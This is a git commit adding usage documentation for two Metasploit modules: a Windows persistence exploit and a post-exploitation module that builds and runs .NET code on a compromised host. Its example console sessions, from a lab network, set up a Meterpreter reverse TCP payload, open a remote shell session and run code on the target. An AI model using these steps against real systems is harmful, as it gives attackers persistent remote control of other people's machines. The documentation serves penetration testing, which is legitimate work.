add module documentation

busterb · busterb · commit df597a7bb750 · 2016-10-08T20:17:54.000-05:00
diff --git a/documentation/modules/exploit/windows/local/ps_persist.md b/documentation/modules/exploit/windows/local/ps_persist.md
@@ -0,0 +1,63 @@
+
+## Example Usage
+
+```
+msf exploit(handler) > use exploit/windows/local/ps_persist
+msf exploit(ps_persist) > set session -1
+session => -1
+msf exploit(ps_persist) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(ps_persist) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf exploit(ps_persist) > set lport 4445
+lport => 4445
+msf exploit(ps_persist) > show options
+
+Module options (exploit/windows/local/ps_persist):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   OUTPUT_TARGET                   no        Name and path of the generated executable, default random, omit extension
+   SESSION        -1               yes       The session to run this module on.
+   START_APP      true             no        Run EXE/Install Service
+   SVC_DNAME      MsfDynSvc        no        Display Name to use for the Windows Service
+   SVC_GEN        false            no        Build a Windows service, which defaults to running as localsystem
+   SVC_NAME       MsfDynSvc        no        Name to use for the Windows Service
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST                      yes       The listen address
+   LPORT     4445             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Universal
+
+
+msf exploit(ps_persist) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4445
+[+]  - Bytes remaining: 9664
+[+]  - Bytes remaining: 1664
+[+] Payload successfully staged.
+[*] Sending stage (957999 bytes) to 192.168.56.101
+[+] Finished!
+[*] Meterpreter session 2 opened (192.168.56.1:4445 -> 192.168.56.101:49974) at 2016-10-08 18:42:36 -0500
+
+meterpreter > sysinfo
+Computer        : DESKTOP-B8ALP1P
+OS              : Windows 10 (Build 14393).
+Architecture    : x64 (Current Process is WOW64)
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/win32
+```
+
diff --git a/documentation/modules/post/windows/manage/powershell/build_net_code.md b/documentation/modules/post/windows/manage/powershell/build_net_code.md
@@ -0,0 +1,57 @@
+## Example Session
+
+/tmp/hello.cs contains the following:
+
+```
+using System;
+
+public class Hello
+{
+   public static void Main()
+   {
+      Console.WriteLine("Hello, World!");
+   }
+}
+```
+
+To build and run the code:
+
+```
+msf exploit(handler) > use post/windows/manage/powershell/build_net_code
+msf post(build_net_code) > set session -1
+session => -1
+msf post(build_net_code) > show options
+
+Module options (post/windows/manage/powershell/build_net_code):
+
+   Name           Current Setting                                            Required  Description
+   ----           ---------------                                            --------  -----------
+   ASSEMBLIES     mscorlib.dll, System.dll, System.Xml.dll, System.Data.dll  no        Any assemblies outside the defaults
+   CODE_PROVIDER  Microsoft.CSharp.CSharpCodeProvider                        yes       Code provider to use
+   COMPILER_OPTS  /optimize                                                  no        Options to pass to compiler
+   OUTPUT_TARGET                                                             no        Name and path of the generated binary, default random, omit extension
+   RUN_BINARY     false                                                      no        Execute the generated binary
+   SESSION        -1                                                         yes       The session to run this module on.
+   SOURCE_FILE                                                               yes       Path to source code
+
+msf post(build_net_code) > set SOURCE_FILE /tmp/hello.cs
+SOURCE_FILE => /tmp/hello.cs
+msf post(build_net_code) > run
+
+[*] Building remote code.
+[+] File C:\cygwin64\tmp\aNwCFmmLzlYvPWw.exe found, 3584kb
+[+] Finished!
+[*] Post module execution completed
+msf post(build_net_code) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 4840 created.
+Channel 7 created.
+Microsoft Windows [Version 10.0.14393]
+(c) 2016 Microsoft Corporation. All rights reserved.
+
+E:\metasploit-framework>C:\cygwin64\tmp\aNwCFmmLzlYvPWw.exe
+C:\cygwin64\tmp\aNwCFmmLzlYvPWw.exe
+Hello, World!
+```
